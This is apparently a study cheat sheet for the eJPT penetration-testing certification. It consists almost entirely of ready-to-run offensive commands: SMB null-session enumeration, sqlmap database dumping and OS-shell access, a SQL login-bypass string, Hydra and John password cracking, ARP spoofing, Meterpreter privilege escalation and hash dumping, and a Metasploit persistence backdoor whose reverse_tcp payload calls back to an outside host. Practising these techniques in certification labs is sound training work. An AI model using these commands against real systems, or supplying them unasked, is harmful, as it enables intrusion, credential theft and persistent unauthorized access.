EJPT Cheat Sheet

All the commands you need to pass the Elearnsecurity Junior Penetration Tester (EJPT)

Routing

View the existing routes

route
ip route

Add new routes manually

ip route add ROUTETO via ROUTEFROM

example:

sudo ip route add 192.168.222.0/24 via 10.175.34.1

Enumeration and Scanning

Whois

Whois site

Ping Sweep

fping -a -g <ip-subnet/subnet mask> 2>/dev/null

example:

fping -a -g 192.168.222.0/24 2>/dev/null

Nmap

# OS Detection, no ping
nmap -Pn -O 10.10.10.10

# def scripts, version check
nmap -sC -sV 10.10.10.10

# above + All ports
nmap -sC -sV -p- 10.10.10.10

# UDP version check
nmap -sU -sV 10.10.10.10

#Syn scan, Version Scan, Os Detection, Aggressive,Port scan only.
sudo nmap -sS -sV -O -A -Pn 172.16.64.182,199 > nmap.txt

#checke for vulnerability using scripts
nmap --script=vuln -A  172.16.64.182,199 > nmap.txt

SMB/SAMBA

nbtscan

nbtscan -A 10.10.10.10

net view

net view 10.10.10.10

net use

# c$ - shares in c drive
# admin$ - windows install directory
# ipc$ - inter process use (not viewable on browser)

# using no user/pass login

net use \\10.10.10.10\IPC$ '' /u:''
# The command completed successfully.

net use \\10.10.10.10\ADMIN$ '' /u:
# System error 5 has occurred.

# Access is denied.

enum

# enumerate users
enum -U 10.10.10.10

# enumerate password policy
enum -P 10.10.10.10

nmblookup

nmblookup -A 10.10.10.10

smbclient

# no password mode -N
smbclient -L //10.10.10.10 -N

mysql

#Connecting database to site
mysql -u USERNAME -p PASSWORD -h HOST DB

#Selecting Database
use <db_name>

#viewing tables
show tables;

#select the tables
select * from <table_name>

SQLi and Sqlmap

sqlmap -u http://10.10.10.10 -p parameter
sqlmap -u http://10.10.10.10  --data POSTstring -p parameter
sqlmap -u http://10.10.10.10 --os-shell
sqlmap -u http://10.10.10.10 --dump
#list databases
sqlmap -u http://10.124.211.96/newsdetails.php?id=33 --dbs

#select database and list tables
sqlmap -u http://10.124.211.96/newsdetails.php?id=33 --dbs 'database_name' --tables

#Dump specific database
sqlmap -u http://10.124.211.96/newsdetails.php?id=33 -D awd -T accounts --dump 

# banner grabbing
sqlmap -u http://10.10.10.10/view.php?id=1 -b

# dump specified database
sqlmap -u http://10.10.10.10/view.php?id=1 --current-db selfie4you --dump

#sql login pages bypass
' or 1=1; -- -

John for cracking

john -wordlist /path/to/wordlist -users=users.txt hashfile

Hydra

hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22
hydra -L users.txt -P pass.txt telnet://10.10.10.10

SMB / SAMBA

nmblookup -A 10.10.10.10
smbclient -L //10.10.10.10 -N (list shares)
smbclient //10.10.10.10/share -N (mount share)
enum4linux -a 10.10.10.10

ARP spoofing (Dsniff)

# tells my machine to forward packets incepted to the real desination hosts
echo 1 > /proc/sys/net/ipv4/ip_forward

# arpspoof -i <interface> -t <target> -r <host>
arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11

Metasploit

search x
use x
info
show options
show advanced

Meterpreter

background
sessions -l
sessions -i 1
sysinfo
ifconfig
route

# get which user is running process
getuid

# privilege escalation ('User Account Control' GPO policy may prevent this)
getsystem

# bypass the restriction of 'User Account Control' GPO policy to privesc
bypassuac

# transfering files
download x /root/
upload x C:\\Windows

# run standard operating system shell
shell


use post/windows/gather/hashdump

Meterpreter - persistence backdoor

# persistent backdoor - need meterpreter session
msf > use exploit/windows/local/s4u_persistence
msf (s4u_persistence) > set session 2
#session => 2
msf (s4u_persistence) > set trigger logon
#trigger => logon
msf (s4u_persistence) > set payload windows/meterpreter/reverse_tcp
msf (s4u_persistence) > set lhost 1.2.3.4
msf (s4u_persistence) > set lport 1234
msf (s4u_persistence) > exploit


msf (s4u_persistence) > use exploit/multi/handler
msf (handler) > set payload windows/meterpreter/reverse_tcp
msf (handler) > exploit

# once victim restarts and logons, we will get a meterpreter shell

Last updated